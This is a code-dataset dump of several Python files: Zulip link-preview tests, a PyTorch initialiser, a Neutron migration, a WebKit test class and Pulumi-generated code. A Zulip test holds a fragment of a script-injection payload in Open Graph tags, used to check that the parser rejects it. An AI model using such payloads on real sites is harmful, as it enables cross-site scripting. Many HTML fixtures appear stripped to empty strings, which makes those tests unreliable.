    ',\n 'version': '1.0',\n 'width': 658,\n 'height': 400}\n response.text = orjson.dumps(response_data).decode()\n url = 'http://blip.tv/video/158727223'\n data = get_oembed_data(url)\n self.assertIsInstance(data, dict)\n self.assertIn('title', data)\n assert data is not None # allow mypy to infer data is indexable\n self.assertEqual(data['title'], response_data['title'])\n\n @mock.patch('pyoembed.requests.get')\n def test_error_request(self, get: Any) -> None:\n get.return_value = response = mock.Mock()\n response.ok = False\n url = 'http://instagram.com/p/BLtI2WdAymy'\n data = get_oembed_data(url)\n self.assertIsNone(data)\n\n @mock.patch('pyoembed.requests.get')\n def test_invalid_json_in_response(self, get: Any) -> None:\n get.return_value = response = mock.Mock()\n response.headers = {'content-type': 'application/json'}\n response.ok = True\n response.text = '{invalid json}'\n url = 'http://instagram.com/p/BLtI2WdAymy'\n data = get_oembed_data(url)\n self.assertIsNone(data)\n\n def test_oembed_html(self) -> None:\n html = ''\n stripped_html = strip_cdata(html)\n self.assertEqual(html, stripped_html)\n\n def test_autodiscovered_oembed_xml_format_html(self) -> None:\n iframe_content = ''\n html = f''\n stripped_html = strip_cdata(html)\n self.assertEqual(iframe_content, stripped_html)\n\n\nclass OpenGraphParserTestCase(ZulipTestCase):\n def test_page_with_og(self) -> None:\n html = \"\"\"\n \n \n \n \n \n \n \n \"\"\"\n\n parser = OpenGraphParser(html)\n result = parser.extract_data()\n self.assertIn('title', result)\n self.assertEqual(result['title'], 'The Rock')\n self.assertEqual(result.get('description'), 'The Rock film')\n\n def test_page_with_evil_og_tags(self) -> None:\n html = \"\"\"\n \n \n \n \n \n \n alert(window.location)\" />\n \n \n \"\"\"\n\n parser = OpenGraphParser(html)\n result = parser.extract_data()\n self.assertIn('title', result)\n self.assertEqual(result['title'], 'The Rock')\n self.assertEqual(result.get('description'), 'The Rock film')\n self.assertEqual(result.get('oembed'), None)\n self.assertEqual(result.get('html'), None)\n\nclass GenericParserTestCase(ZulipTestCase):\n def test_parser(self) -> None:\n html = \"\"\"\n \n Test title\n \n

    Main header

    \n

    Description text

    \n \n \n \"\"\"\n parser = GenericParser(html)\n result = parser.extract_data()\n self.assertEqual(result.get('title'), 'Test title')\n self.assertEqual(result.get('description'), 'Description text')\n\n def test_extract_image(self) -> None:\n html = \"\"\"\n \n \n

    Main header

    \n \n \n
    \n

    Description text

    \n
    \n \n \n \"\"\"\n parser = GenericParser(html)\n result = parser.extract_data()\n self.assertEqual(result.get('title'), 'Main header')\n self.assertEqual(result.get('description'), 'Description text')\n self.assertEqual(result.get('image'), 'http://test.com/test.jpg')\n\n def test_extract_description(self) -> None:\n html = \"\"\"\n \n \n
    \n
    \n

    Description text

    \n
    \n
    \n \n \n \"\"\"\n parser = GenericParser(html)\n result = parser.extract_data()\n self.assertEqual(result.get('description'), 'Description text')\n\n html = \"\"\"\n \n \n \n \n \"\"\"\n parser = GenericParser(html)\n result = parser.extract_data()\n self.assertEqual(result.get('description'), 'description 123')\n\n html = \"\"\n parser = GenericParser(html)\n result = parser.extract_data()\n self.assertIsNone(result.get('description'))\n\n\nclass PreviewTestCase(ZulipTestCase):\n open_graph_html = \"\"\"\n \n \n Test title\n \n \n \n \n \n \n \n \n

    Main header

    \n

    Description text

    \n \n \n \"\"\"\n\n def setUp(self) -> None:\n super().setUp()\n Realm.objects.all().update(inline_url_embed_preview=True)\n\n @classmethod\n def create_mock_response(cls, url: str, relative_url: bool=False,\n headers: Optional[Dict[str, str]]=None,\n html: Optional[str]=None) -> Callable[..., MockPythonResponse]:\n if html is None:\n html = cls.open_graph_html\n if relative_url is True:\n html = html.replace('http://ia.media-imdb.com', '')\n response = MockPythonResponse(html, 200, headers)\n return lambda k, **kwargs: {url: response}.get(k, MockPythonResponse('', 404, headers))\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_edit_message_history(self) -> None:\n user = self.example_user('hamlet')\n self.login_user(user)\n msg_id = self.send_stream_message(user, \"Scotland\",\n topic_name=\"editing\", content=\"original\")\n\n url = 'http://test.org/'\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url))\n\n with mock_queue_publish('zerver.views.message_edit.queue_json_publish') as patched:\n result = self.client_patch(\"/json/messages/\" + str(msg_id), {\n 'message_id': msg_id, 'content': url,\n })\n self.assert_json_success(result)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n embedded_link = f'The Rock'\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertIn(embedded_link, msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def _send_message_with_test_org_url(self, sender: UserProfile, queue_should_run: bool=True,\n relative_url: bool=False) -> Message:\n url = 'http://test.org/'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_personal_message(\n sender,\n self.example_user('cordelia'),\n content=url,\n )\n if queue_should_run:\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n else:\n patched.assert_not_called()\n # If we nothing was put in the queue, we don't need to\n # run the queue processor or any of the following code\n return Message.objects.select_related(\"sender\").get(id=msg_id)\n\n # Verify the initial message doesn't have the embedded links rendered\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertNotIn(\n f'The Rock',\n msg.rendered_content)\n\n # Mock the network request result so the test can be fast without Internet\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url, relative_url=relative_url))\n\n # Run the queue processor to potentially rerender things\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n return msg\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_message_update_race_condition(self) -> None:\n user = self.example_user('hamlet')\n self.login_user(user)\n original_url = 'http://test.org/'\n edited_url = 'http://edited.org/'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_stream_message(user, \"Scotland\",\n topic_name=\"foo\", content=original_url)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n def wrapped_queue_json_publish(*args: Any, **kwargs: Any) -> None:\n # Mock the network request result so the test can be fast without Internet\n mocked_response_original = mock.Mock(side_effect=self.create_mock_response(original_url))\n mocked_response_edited = mock.Mock(side_effect=self.create_mock_response(edited_url))\n\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response_original), self.assertLogs(level='INFO') as info_logs:\n # Run the queue processor. This will simulate the event for original_url being\n # processed after the message has been edited.\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n # The content of the message has changed since the event for original_url has been created,\n # it should not be rendered. Another, up-to-date event will have been sent (edited_url).\n self.assertNotIn(f'The Rock',\n msg.rendered_content)\n mocked_response_edited.assert_not_called()\n\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response_edited), self.assertLogs(level='INFO') as info_logs:\n # Now proceed with the original queue_json_publish and call the\n # up-to-date event for edited_url.\n queue_json_publish(*args, **kwargs)\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertIn(f'The Rock',\n msg.rendered_content)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://edited.org/: ' in info_logs.output[0]\n )\n\n with mock_queue_publish('zerver.views.message_edit.queue_json_publish', wraps=wrapped_queue_json_publish):\n result = self.client_patch(\"/json/messages/\" + str(msg_id), {\n 'message_id': msg_id, 'content': edited_url,\n })\n self.assert_json_success(result)\n\n def test_get_link_embed_data(self) -> None:\n url = 'http://test.org/'\n embedded_link = f'The Rock'\n\n # When humans send, we should get embedded content.\n msg = self._send_message_with_test_org_url(sender=self.example_user('hamlet'))\n self.assertIn(embedded_link, msg.rendered_content)\n\n # We don't want embedded content for bots.\n msg = self._send_message_with_test_org_url(sender=self.example_user('webhook_bot'),\n queue_should_run=False)\n self.assertNotIn(embedded_link, msg.rendered_content)\n\n # Try another human to make sure bot failure was due to the\n # bot sending the message and not some other reason.\n msg = self._send_message_with_test_org_url(sender=self.example_user('prospero'))\n self.assertIn(embedded_link, msg.rendered_content)\n\n def test_inline_url_embed_preview(self) -> None:\n with_preview = '

    http://test.org/

    \\n
    Description text
    '\n without_preview = '

    http://test.org/

    '\n msg = self._send_message_with_test_org_url(sender=self.example_user('hamlet'))\n self.assertEqual(msg.rendered_content, with_preview)\n\n realm = msg.get_realm()\n setattr(realm, 'inline_url_embed_preview', False)\n realm.save()\n\n msg = self._send_message_with_test_org_url(sender=self.example_user('prospero'), queue_should_run=False)\n self.assertEqual(msg.rendered_content, without_preview)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_inline_relative_url_embed_preview(self) -> None:\n # Relative URLs should not be sent for URL preview.\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n self.send_personal_message(\n self.example_user('prospero'),\n self.example_user('cordelia'),\n content=\"http://zulip.testserver/api/\",\n )\n patched.assert_not_called()\n\n def test_inline_url_embed_preview_with_relative_image_url(self) -> None:\n with_preview_relative = '

    http://test.org/

    \\n
    Description text
    '\n # Try case where the Open Graph image is a relative URL.\n msg = self._send_message_with_test_org_url(sender=self.example_user('prospero'), relative_url=True)\n self.assertEqual(msg.rendered_content, with_preview_relative)\n\n def test_http_error_get_data(self) -> None:\n url = 'http://test.org/'\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': url}\n with self.settings(INLINE_URL_EMBED_PREVIEW=True, TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mock.Mock(side_effect=ConnectionError())), \\\n self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n msg = Message.objects.get(id=msg_id)\n self.assertEqual(\n '

    http://test.org/

    ',\n msg.rendered_content)\n\n def test_invalid_link(self) -> None:\n with self.settings(INLINE_URL_EMBED_PREVIEW=True, TEST_SUITE=False, CACHES=TEST_CACHES):\n self.assertIsNone(get_link_embed_data('com.notvalidlink'))\n self.assertIsNone(get_link_embed_data('μένει.com.notvalidlink'))\n\n def test_link_embed_data_from_cache(self) -> None:\n url = 'http://test.org/'\n link_embed_data = 'test data'\n\n with self.assertRaises(NotFoundInCache):\n link_embed_data_from_cache(url)\n\n with self.settings(CACHES=TEST_CACHES):\n key = preview_url_cache_key(url)\n cache_set(key, link_embed_data, 'database')\n self.assertEqual(link_embed_data, link_embed_data_from_cache(url))\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_link_preview_non_html_data(self) -> None:\n user = self.example_user('hamlet')\n self.login_user(user)\n url = 'http://test.org/audio.mp3'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_stream_message(user, \"Scotland\", topic_name=\"foo\", content=url)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n headers = {'content-type': 'application/octet-stream'}\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url, headers=headers))\n\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n cached_data = link_embed_data_from_cache(url)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/audio.mp3: ' in info_logs.output[0]\n )\n\n self.assertIsNone(cached_data)\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertEqual(\n ('

    '\n 'http://test.org/audio.mp3

    '),\n msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_link_preview_no_open_graph_image(self) -> None:\n user = self.example_user('hamlet')\n self.login_user(user)\n url = 'http://test.org/foo.html'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_stream_message(user, \"Scotland\", topic_name=\"foo\", content=url)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n # HTML without the og:image metadata\n html = '\\n'.join(line for line in self.open_graph_html.splitlines() if 'og:image' not in line)\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url, html=html))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n cached_data = link_embed_data_from_cache(url)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/foo.html: ' in info_logs.output[0]\n )\n\n self.assertIn('title', cached_data)\n self.assertNotIn('image', cached_data)\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertEqual(\n ('

    '\n 'http://test.org/foo.html

    '),\n msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_link_preview_open_graph_image_missing_content(self) -> None:\n user = self.example_user('hamlet')\n self.login_user(user)\n url = 'http://test.org/foo.html'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_stream_message(user, \"Scotland\", topic_name=\"foo\", content=url)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n # HTML without the og:image metadata\n html = '\\n'.join(line if 'og:image' not in line else ''\n for line in self.open_graph_html.splitlines())\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url, html=html))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n cached_data = link_embed_data_from_cache(url)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/foo.html: ' in info_logs.output[0]\n )\n\n self.assertIn('title', cached_data)\n self.assertNotIn('image', cached_data)\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertEqual(\n ('

    '\n 'http://test.org/foo.html

    '),\n msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_link_preview_no_content_type_header(self) -> None:\n user = self.example_user('hamlet')\n self.login_user(user)\n url = 'http://test.org/'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish') as patched:\n msg_id = self.send_stream_message(user, \"Scotland\", topic_name=\"foo\", content=url)\n patched.assert_called_once()\n queue = patched.call_args[0][0]\n self.assertEqual(queue, \"embed_links\")\n event = patched.call_args[0][1]\n\n headers = {'content-type': ''} # No content type header\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url, headers=headers))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n data = link_embed_data_from_cache(url)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n self.assertIn('title', data)\n self.assertIn('image', data)\n\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n self.assertIn(data['title'], msg.rendered_content)\n self.assertIn(data['image'], msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_valid_content_type_error_get_data(self) -> None:\n url = 'http://test.org/'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish'):\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': url}\n\n with mock.patch('zerver.lib.url_preview.preview.get_oembed_data', side_effect=lambda *args, **kwargs: None):\n with mock.patch('zerver.lib.url_preview.preview.valid_content_type', side_effect=lambda k: True):\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mock.Mock(side_effect=ConnectionError())), \\\n self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n with self.assertRaises(NotFoundInCache):\n link_embed_data_from_cache(url)\n\n msg.refresh_from_db()\n self.assertEqual(\n '

    http://test.org/

    ',\n msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_invalid_url(self) -> None:\n url = 'http://test.org/'\n error_url = 'http://test.org/x'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish'):\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=error_url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [error_url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': error_url}\n\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/x: ' in info_logs.output[0]\n )\n cached_data = link_embed_data_from_cache(error_url)\n\n # FIXME: Should we really cache this, especially without cache invalidation?\n self.assertIsNone(cached_data)\n msg.refresh_from_db()\n self.assertEqual(\n '

    http://test.org/x

    ',\n msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_safe_oembed_html_url(self) -> None:\n url = 'http://test.org/'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish'):\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': url}\n\n mocked_data = {'html': f'',\n 'oembed': True, 'type': 'video', 'image': f'{url}/image.png'}\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n with mock.patch('zerver.lib.url_preview.preview.get_oembed_data',\n lambda *args, **kwargs: mocked_data):\n FetchLinksEmbedData().consume(event)\n data = link_embed_data_from_cache(url)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for http://test.org/: ' in info_logs.output[0]\n )\n\n self.assertEqual(data, mocked_data)\n msg.refresh_from_db()\n self.assertIn('a data-id=\"{}\"'.format(escape(mocked_data['html'])), msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_youtube_url_title_replaces_url(self) -> None:\n url = 'https://www.youtube.com/watch?v=eSJTXC7Ixgg'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish'):\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': url}\n\n mocked_data = {'title': 'Clearer Code at Scale - Static Types at Zulip and Dropbox'}\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n with mock.patch('zerver.lib.markdown.link_preview.link_embed_data_from_cache',\n lambda *args, **kwargs: mocked_data):\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for https://www.youtube.com/watch?v=eSJTXC7Ixgg:' in info_logs.output[0]\n )\n\n msg.refresh_from_db()\n expected_content = '

    YouTube - Clearer Code at Scale - Static Types at Zulip and Dropbox

    \\n
    '\n self.assertEqual(expected_content, msg.rendered_content)\n\n @override_settings(INLINE_URL_EMBED_PREVIEW=True)\n def test_custom_title_replaces_youtube_url_title(self) -> None:\n url = '[YouTube link](https://www.youtube.com/watch?v=eSJTXC7Ixgg)'\n with mock_queue_publish('zerver.lib.actions.queue_json_publish'):\n msg_id = self.send_personal_message(\n self.example_user('hamlet'),\n self.example_user('cordelia'),\n content=url,\n )\n msg = Message.objects.select_related(\"sender\").get(id=msg_id)\n event = {\n 'message_id': msg_id,\n 'urls': [url],\n 'message_realm_id': msg.sender.realm_id,\n 'message_content': url}\n\n mocked_data = {'title': 'Clearer Code at Scale - Static Types at Zulip and Dropbox'}\n mocked_response = mock.Mock(side_effect=self.create_mock_response(url))\n with self.settings(TEST_SUITE=False, CACHES=TEST_CACHES):\n with mock.patch('requests.get', mocked_response), self.assertLogs(level='INFO') as info_logs:\n with mock.patch('zerver.lib.markdown.link_preview.link_embed_data_from_cache',\n lambda *args, **kwargs: mocked_data):\n FetchLinksEmbedData().consume(event)\n self.assertTrue(\n 'INFO:root:Time spent on get_link_embed_data for [YouTube link](https://www.youtube.com/watch?v=eSJTXC7Ixgg):' in info_logs.output[0]\n )\n\n msg.refresh_from_db()\n expected_content = '

    YouTube link

    \\n
    '\n self.assertEqual(expected_content, msg.rendered_content)\n"} {"ext": "py", "sha": "1a302fc538ed2033f4d04d52bf90988eb52c0149", "content": "import math\nfrom ..utility.static_vars import *\n\n\ndef _constant(parameter, value):\n parameter.data.fill_(value)\n\n\ndef _zero(parameter):\n _constant(parameter, 0)\n\n\ndef _one(parameter):\n _constant(parameter, 1)\n\n\ndef _normal(parameter, mean, std):\n parameter.data.normal_(mean, std)\n\n\ndef _uniform(parameter, bound):\n parameter.data.uniform_(-bound, bound)\n\n\ndef _kaiming(parameter, fan, a):\n _uniform(parameter, math.sqrt(6 / ((1 + a ** 2) * fan)))\n\n\ndef _glorot(parameter):\n _uniform(parameter, math.sqrt(6.0 / (parameter.size(-2) + parameter.size(-1))))\n\n\n@static_vars(fun=None)\ndef init(parameter, type, *args, **kwargs):\n \"\"\"\n Initialize the given parameters with the specified initialization type\n\n Parameters\n ----------\n parameter : torch.nn.Parameter\n the parameter to initialize\n type : str\n the initialization type. Should be one between:\n 'constant', 'zero', 'one', 'normal', 'kaiming', 'glorot' (or 'xavier')\n args : ...\n the arguments of the specified initialization type\n kwargs : ...\n the keyword arguments of the specified initialization type\n\n Returns\n -------\n torch.nn.Parameter\n the initialized parameter\n \"\"\"\n if not init.fun:\n init.fun = {\n 'constant': _constant,\n 'zero': _zero,\n 'one': _one,\n 'normal': _normal,\n 'kaiming': _kaiming,\n 'glorot': _glorot,\n 'xavier': _glorot,\n }\n if parameter is not None:\n if type not in init.fun:\n raise ValueError('Type unknown. Please choose among one of the following: {}'.format('\\n'.join(list(init.fun.keys()))))\n init.fun[type](parameter, *args, **kwargs)\n return parameter\n"} {"ext": "py", "sha": "1a302ff1179861321b53b352710d282bb3b342bd", "content": "# Copyright 2014 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\n\"\"\"ml2_vnic_type\n\nRevision ID: 27cc183af192\nRevises: 4ca36cfc898c\nCreate Date: 2014-02-09 12:19:21.362967\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '27cc183af192'\ndown_revision = '4ca36cfc898c'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\nfrom neutron.db import migration\n\n\ndef upgrade():\n if migration.schema_has_table('ml2_port_bindings'):\n op.add_column('ml2_port_bindings',\n sa.Column('vnic_type', sa.String(length=64),\n nullable=False,\n server_default='normal'))\n"} {"ext": "py", "sha": "1a3030fa80ac15146753e094f3ad868bd2a41199", "content": "# Copyright (C) 2010 Google Inc. All rights reserved.\n# Copyright (C) 2010 Gabor Rapcsanyi (rgabor@inf.u-szeged.hu), University of Szeged\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of Google Inc. nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\nclass TestInput(object):\n \"\"\"Groups information about a test for easy passing of data.\"\"\"\n\n def __init__(self, test_name, timeout=None, requires_lock=None, reference_files=None, should_run_pixel_tests=None, should_add_missing_baselines=True):\n # TestInput objects are normally constructed by the manager and passed\n # to the workers, but these some fields are set lazily in the workers where possible\n # because they require us to look at the filesystem and we want to be able to do that in parallel.\n self.test_name = test_name\n self.timeout = timeout # in msecs; should rename this for consistency\n self.requires_lock = requires_lock\n self.reference_files = reference_files\n self.should_run_pixel_tests = should_run_pixel_tests\n self.should_add_missing_baselines = should_add_missing_baselines\n\n def __repr__(self):\n return \"TestInput('%s', timeout=%s, requires_lock=%s, reference_files=%s, should_run_pixel_tests=%s, should_add_missing_baselines%s)\" % (self.test_name, self.timeout, self.requires_lock, self.reference_files, self.should_run_pixel_tests, self.should_add_missing_baselines)\n"} {"ext": "py", "sha": "1a3031c093c77a2f9fca69a9a31d97ce454786c8", "content": "# coding=utf-8\n# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***\n# *** Do not edit by hand unless you're certain you know what you are doing! ***\n\nimport warnings\nimport pulumi\nimport pulumi.runtime\nfrom typing import Any, Mapping, Optional, Sequence, Union, overload\nfrom . import _utilities\n\n__all__ = [\n 'GetAntiAffinityGroupResult',\n 'AwaitableGetAntiAffinityGroupResult',\n 'get_anti_affinity_group',\n 'get_anti_affinity_group_output',\n]\n\n@pulumi.output_type\nclass GetAntiAffinityGroupResult:\n \"\"\"\n A collection of values returned by getAntiAffinityGroup.\n \"\"\"\n def __init__(__self__, id=None, instances=None, name=None):\n if id and not isinstance(id, str):\n raise TypeError(\"Expected argument 'id' to be a str\")\n pulumi.set(__self__, \"id\", id)\n if instances and not isinstance(instances, list):\n raise TypeError(\"Expected argument 'instances' to be a list\")\n pulumi.set(__self__, \"instances\", instances)\n if name and not isinstance(name, str):\n raise TypeError(\"Expected argument 'name' to be a str\")\n pulumi.set(__self__, \"name\", name)\n\n @property\n @pulumi.getter\n def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")\n\n @property\n @pulumi.getter\n def instances(self) -> Sequence[str]:\n \"\"\"\n A list of Compute instance IDs belonging to the Anti-Affinity Group.\n \"\"\"\n return pulumi.get(self, \"instances\")\n\n @property\n @pulumi.getter\n def name(self) -> Optional[str]:\n return pulumi.get(self, \"name\")\n\n\nclass AwaitableGetAntiAffinityGroupResult(GetAntiAffinityGroupResult):\n # pylint: disable=using-constant-test\n def __await__(self):\n if False:\n yield self\n return GetAntiAffinityGroupResult(\n id=self.id,\n instances=self.instances,\n name=self.name)\n\n\ndef get_anti_affinity_group(id: Optional[str] = None,\n name: Optional[str] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetAntiAffinityGroupResult:\n \"\"\"\n Provides information on an [Anti-Affinity Group][aag-doc] for use in other resources such as a [`Compute`][r-compute] resource.\n\n ## Example 